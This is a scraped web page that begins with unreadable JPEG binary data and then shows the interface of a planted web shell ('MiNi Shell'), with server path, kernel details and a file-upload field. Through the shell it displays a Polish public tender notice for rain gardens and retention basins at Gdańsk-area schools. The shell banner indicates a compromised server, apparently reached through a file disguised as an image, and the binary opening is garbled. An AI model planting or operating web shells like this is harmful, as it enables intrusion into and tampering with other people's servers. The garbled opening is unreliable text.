JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230418/0018018801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zaprojektowanie i wybudowanie zielono-niebieskiej infrastruktury w ramach projektu „Klimat w szkołach metropolii” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Obszar Metropolitalny Gdańsk-Gdynia-Sopot</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 221654880</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Długi Targ 39/40</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-830</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@metropoliagdansk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.metropoliagdansk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Stowarzyszenie samorządowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zaprojektowanie i wybudowanie zielono-niebieskiej infrastruktury w ramach projektu „Klimat w szkołach metropolii” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8a6d6163-ddb0-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00180188</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00071409/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Zaprojektowanie i wybudowanie w ramach projektu „Klimat w szkołach metropolii” zielonych ścian; skrzyniowych ogrodów deszczowych; gruntowych ogrodów deszczowych i niecek retencyjnych; kompostowników</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt jest realizowany w ramach programu Środowisko, Energia i Zmiany Klimatu. Dofinansowanie pochodzi ze środków Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2014-2021 oraz budżetu państwa. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8a6d6163-ddb0-11ed-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl <br/><br/>W uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: biuro@metropoliagdansk.pl oraz marta.gorczyca@metropoliagdansk.pl (nie dotyczy składania ofert). Osobami uprawnionymi do porozumiewania się z Wykonawcami są: <br/>Mariusz Sadłowski – mariusz.sadlowski@metropoliagdansk.pl ; <br/>Marta Gorczyca – marta.gorczyca@metropoliagdansk.pl <br/><br/>Zamawiający nie przewiduje komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. <br/>Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). <br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. <br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. Urz. UE L 119 z dnia 4 maja 2016 r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że:<br/>1.	Administratorem Pani/Pana danych osobowych jest Stowarzyszenie OBSZAR METROPOLITALNY GDAŃSK-GDYNIA-SOPOT /OMGGS/ z siedzibą w Gdańsku 80-830 przy ul. Długi Targ 39/40.<br/>2.	W sprawach związanych z Pani/Pana danymi, prosimy o kontakt z Inspektorem Ochrony Danych Osobowych pod adresem: iod@metropoliagdansk.pl<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia zgodnie z przepisami uPzp.<br/>4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 uPzp. Ponadto, z uwagi na korzystanie przez OMGGS z portalu www.ezamowienia.gov.pl Pani/Pana dane osobowe przetwarzać będzie również Prezes Urzędu Zamówień Publicznych z siedzibą w Warszawie (02-676) przy ul. Postępu 17A, a także Urząd Miasta Sopotu, ul. Tadeusza Kościuszki 25/27, 81-704 Sopot.<br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 uPzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach uPzp związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8.	Posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z uPzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9.	Nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10.	Zamawiający zwraca uwagę wykonawców, że w stosunku do wykonawców, a także w stosunku do ewentualnych podwykonawców, obowiązek informacyjny o którym mowa w art. 13 ust. 1 i 2 RODO również ma zastosowanie w związku z pozyskiwaniem przez nich danych osobowych od osób, których dane dotyczą. W stosunku do wykonawców, podwykonawców zastosowanie będzie mieć także obowiązek informacyjny wynikający z treści art. 14 ust. 1-4 RODO o ile pozyskają dane osobowe pośrednio.<br/>11.	Jednocześnie zamawiający informuje, że z uwagi na treść wyłączeń zawartych w art. 14 ust. 5 RODO, Zamawiający przetwarzając dane osobowe, które pośrednio pozyska w celu związanym z postępowaniem o udzielenie zamówienia publicznego (dane osób innych niż samego wykonawcy), nie będzie obowiązany do odrębnego wypełnienia obowiązku informacyjnego wynikającego z przepisu art. 14 ust.1-4 RODO. Zamawiający wymaga natomiast, aby obowiązek informacyjny wobec takich osób, których dane osobowe pozyska wykonawca i przekaże zamawiającemu w związku z udziałem w niniejszym postępowaniu o udzielenie zmówienia został wypełniony przez Wykonawcę.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OMGGS/TP2/02/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Zaprojektowanie i wybudowanie zielono-niebieskiej infrastruktury w ramach projektu „Klimat w szkołach metropolii”, (dalej zwana również „Inwestycją” lub „Przedsięwzięciem”) tj.:<br/>a)	łącznie 8 szt. gruntowych ogrodów deszczowych (zakres realizowany w formule „projektuj i wybuduj”) w następujących szkołach:<br/>1.	Szkoła Podstawowa im. Adama Mickiewicza z siedzibą w Chwaszczynie przy ul. A. Mickiewicza 16; <br/>2.	Zespół Szkolno-Przedszkolny Nr 3 z siedzibą w Gdyni przy ul. Nagietkowej 73; <br/>3.	Szkoła Podstawowa im. Więźniów Obozu Stutthof z siedzibą w Niestępowie przy ul. Raduńskiej 62;<br/>4.	Szkoła Podstawowa im. I. J. Paderewskiego z siedzibą w Pruszczu Gdańskim przy ul. Kasprowicza 16; <br/>5.	Powiatowe Centrum Kształcenia Zawodowego i Ustawicznego z siedzibą w Pucku przy ul. Kolejowej 7c; <br/>6.	Szkoła Podstawowa Nr 1 im. Józefa Wybickiego z siedzibą w Rumi przy ul. Kościelnej 6; <br/>7.	Szkoła Podstawowa im. Obrońców Westerplatte z siedzibą w Suchym Dębie przy ul. Sportowej 11; <br/>8.	Zespół Szkół Budowalnych i Odzieżowych im. H. Sienkiewicza z siedzibą w Tczewie przy ul. Bałdowskiej 19; <br/>b)	łącznie 3 szt. niecek retencyjnych (zakres realizowany w formule „projektuj i wybuduj”) w następujących szkołach:<br/>1.	Szkoła Podstawowa im. Kawalerów Orderu Uśmiechu z siedzibą w Borczu przy ul. Kościerskiej 34 A;<br/>2.	Zespół Szkolno-Przedszkolny z siedzibą w Dębogórzu przy ul. Pomorskiej 30;<br/>3.	Centrum Kształcenia Zawodowego i Ustawicznego Nr 2 z siedzibą w Gdańsku przy ul. Smoleńskiej 5/7; <br/>2.	Zamówienie obejmuje:<br/>a)	zaprojektowanie przez Wykonawcę oraz uzgodnienie z Zamawiającym finalnej wersji projektu, będącej podstawą do zgłoszenia przez Wykonawcę realizacji robót oraz uzyskania przez Wykonawcę niezbędnych decyzji, zgód i opinii umożliwiających wykonanie robót na terenie każdej ze szkół objętych danym Przedsięwzięciem;<br/>b)	kompleksowe wykonanie przez Wykonawcę całości prac zgodnie z PROGRAMEM FUNKCJONALNO-UŻYTKOWYM (dalej również jako „PFU”) stanowiącym załącznik do niniejszej SWZ i wszelkich czynności niezbędnych do wykonania przedmiotu zamówienia, w tym oddania obiektów do użytkowania.<br/>Zakres Przedsięwzięcia oraz realizacji zamówienia w odniesieniu do poszczególnych lokalizacji (szkół) szczegółowo został opisany w PFU stanowiącym załącznik nr 8 do SWZ.<br/>Zamawiający przewiduje, iż realizacja Przedsięwzięcia będzie miała charakter realizacji celów cząstkowych, którymi są gruntowe ogrody deszczowe i niecki retencyjne wykonane w szkołach, wymienionych w ust. 1, odrębnie.<br/>3.	Realizacja składa się z 2 Etapów:<br/>a)	Etap 1; <br/>b)	Etap 2;<br/><br/>A.	Etap 1 (pierwszy) Inwestycji będącej przedmiotem zamówienia obejmuje: <br/>Indywidualne zaprojektowanie i uzgodnienie z Zamawiającym projektu realizacji przedmiotu zamówienia dla szkół objętych danych Przedsięwzięciem, wyszczególnionych w ust. 1, w oparciu o PFU przepisy prawa budowlanego, normy, dobre praktyki, standardy, itp.<br/><br/>B.	Etap 2 (drugi) Inwestycji będącej przedmiotem zamówienia obejmuje:<br/>Uzyskanie (stosownie do obowiązujących przepisów prawa) wymaganych zgód, pozwoleń, zezwoleń itp. lub dokonanie wymaganych zgłoszeń w związku z realizacją przedmiotu zamówienia, wykonanie i oddanie do użytkowania prac i robót objętych zamówieniem - odpowiednio dla szkół objętych danych Przedsięwzięciem, wyszczególnionych w ust. 1, na podstawie zatwierdzonej przez Zamawiającego dokumentacji projektowej, dokumentacji wykonawczej oraz zgodnie ze sztuką budowlaną i ogrodniczą i w terminach zgodnych z przyjętym przez Zamawiającego harmonogramem. Wszystkie prace/roboty muszą być wykonane zgodnie z obowiązującymi przepisami, załączonym PFU (załącznik nr 8 do SWZ) oraz pod nadzorem osób uprawnionych. Wszystkie zastosowane materiały muszą być fabrycznie nowe i posiadać wymagane atesty, aprobaty techniczne, deklaracje zgodności itp., oraz muszą być zastosowane zgodnie z ich kartami technicznymi podanymi przez producentów.<br/>4.	Zamówienie obejmuje nadto w szczególności następujące obowiązki Wykonawcy:<br/>a)	Wykonanie i przekazanie w 3 egzemplarzach wersji papierowej dokumentacji powykonawczej, w tym z geodezyjnymi pomiarami oraz dokumentów stanowiących dowód należytego wykonania przedmiotu umowy (atesty, karty gwarancyjne, instrukcje konserwacji, itp.);<br/>b)	Prowadzenie dokumentacji fotograficznej realizowanej Inwestycji i przekazywanie Zamawiającemu na potrzeby weryfikacji założeń projektu wynikających z PFU, sprawozdania z postępu prac oraz komunikowania realizacji projektu w zakresie udokumentowania co najmniej:<br/>1.	prac przygotowawczych i zabezpieczenia terenu;<br/>2.	prac ziemnych, w tym rozszczelnienia podłoża;<br/>3.	prowadzenia nasadzeń;<br/>4.	gotowej inwestycji i otoczenia po zakończeniu inwestycji. <br/>Zdjęcia przekazywane będą w formie cyfrowej, min. 10 zdjęć dla każdego etapu prac, w rozdzielczości min. 300 dpi., drogą mailowa na adres uzgodniony z Zamawiającym.<br/>c)	Opracowanie instrukcji użytkowania: gruntowych ogrodów deszczowych, niecek retencyjnych, odpowiadających i dostosowanych treścią merytoryczną do każdej lokalizacji niezależnie oraz przekazanie ich Zamawiającemu do dnia odbioru częściowego zamówienia w zakresie dotyczącym danej lokalizacji. Instrukcję użytkowania należy przygotować dla każdej lokalizacji uwzględniając specyficzne warunki siedliskowe oraz wymagania nasadzeń. Instrukcja powinna obejmować opis oraz obrazy przedstawiające działania pielęgnacyjne i nie przekraczać 2 stron A4. Do instrukcji należy dołączyć tabelę z zestawieniem ilości posadzonych roślin z podziałem na gatunki i odmiany. Wykonawca przygotuje instrukcję użytkowania w wersji edytowalnej tj. wersja .doc/.docx oraz .pdf i przekaże Zamawiającemu drogą on-line (np. via mail). Instrukcje wymagają akceptacji Zamawiającego na etapie ich opracowywania.<br/>d)	Wykonanie i montaż w gruncie tablic informacyjnych (1 tablica złożona z dwóch plansz). Dla każdej lokalizacji odrębna tablica zawierająca planszę edukacyjną i pamiątkową. Plansza edukacyjna będzie dotyczyła: gruntowych ogrodów deszczowych, niecek retencyjnych, a plansza pamiątkowa organizatora projektu edukacyjnego oraz formy finansowania. Wytyczne w pkt. 2.8.5 PFU. Grafikę do plansz dostarczy Zamawiający. Dokładne miejsce montażu, ostateczny wybór materiału z jakiego będą składać się tablice, rozlokowanie plansz powinno być uzgodnione z Zamawiającym.<br/>e)	Wykonawca dostarczy do szkół narzędzia ogrodnicze i rośliny zgodnie z opisem w PFU, na potrzeby działań edukacyjnych Zamawiającego.<br/>f)	Inwestycja powinna zostać wykonana przy uwzględnieniu obowiązujących przepisów, standardów i dobrych praktyk, w szczególności takich jak: <br/>a.	Ustawa z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. 2021 poz. 2351 ze zm.);<br/>b.	Ustawa z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz.U. 2022 poz. 1710 ze zm.);<br/>c.	Rozporządzenie Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego;<br/>d.	Rozporządzenie Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym;<br/>e.	Obwieszczenie Ministra Inwestycji i Rozwoju z dnia 8 kwietnia 2019 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Ministra Infrastruktury w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie;<br/>f.	Rozporządzenia Ministra Infrastruktury z dnia 6 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. Nr 47, poz. 401);<br/>g.	Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 7 czerwca 2010 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz. U. Nr 109, poz. 719);<br/>h.	Rozporządzenie Ministra Rozwoju z dn. 11.09.2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego, (Dz.U. 2020 poz. 1609);<br/>i.	Ustawa z dnia 16 kwietnia 2004 r. o wyrobach budowlanych oraz wymaganiami określonymi w obowiązujących normach i aprobatach technicznych, (tekst jednolity: Dz.U. 2021 poz. 1213 ze zm.);<br/>j.	Ustawa o odpadach z dnia 14 grudnia 2012 r, (tekst jednolity: Dz.U. 2022 poz. 699 ze zm.).<br/>k.	Standard ochrony drzew i innych form zieleni w procesie inwestycyjnym. Standard opracowany przez Fundację Ekorozwoju oraz Stowarzyszenie Architektury Krajobrazu, 2021;<br/>l.	Aktualna lista inwazyjnych gatunków obcych określona przez Generalną Dyrekcję Ochrony Środowiska oraz Lista gatunków obcych roślin analizowanych w ramach projektu Obce Gatunki Inwazyjne zamieszczonej na stronie internetowej: http://projekty.gdos.gov.pl/igo-lista-inwazyjnych-gatunkow-obcych-roslin <br/>m.	Aktualne zalecenia jakościowe Związku Szkółkarzy Polskich<br/>g)	Wykonawca zobowiązuje się do współpracy z zespołem projektowym „Klimat w szkołach metropolii”, którego reprezentant zostanie określony w umowie. <br/>5.	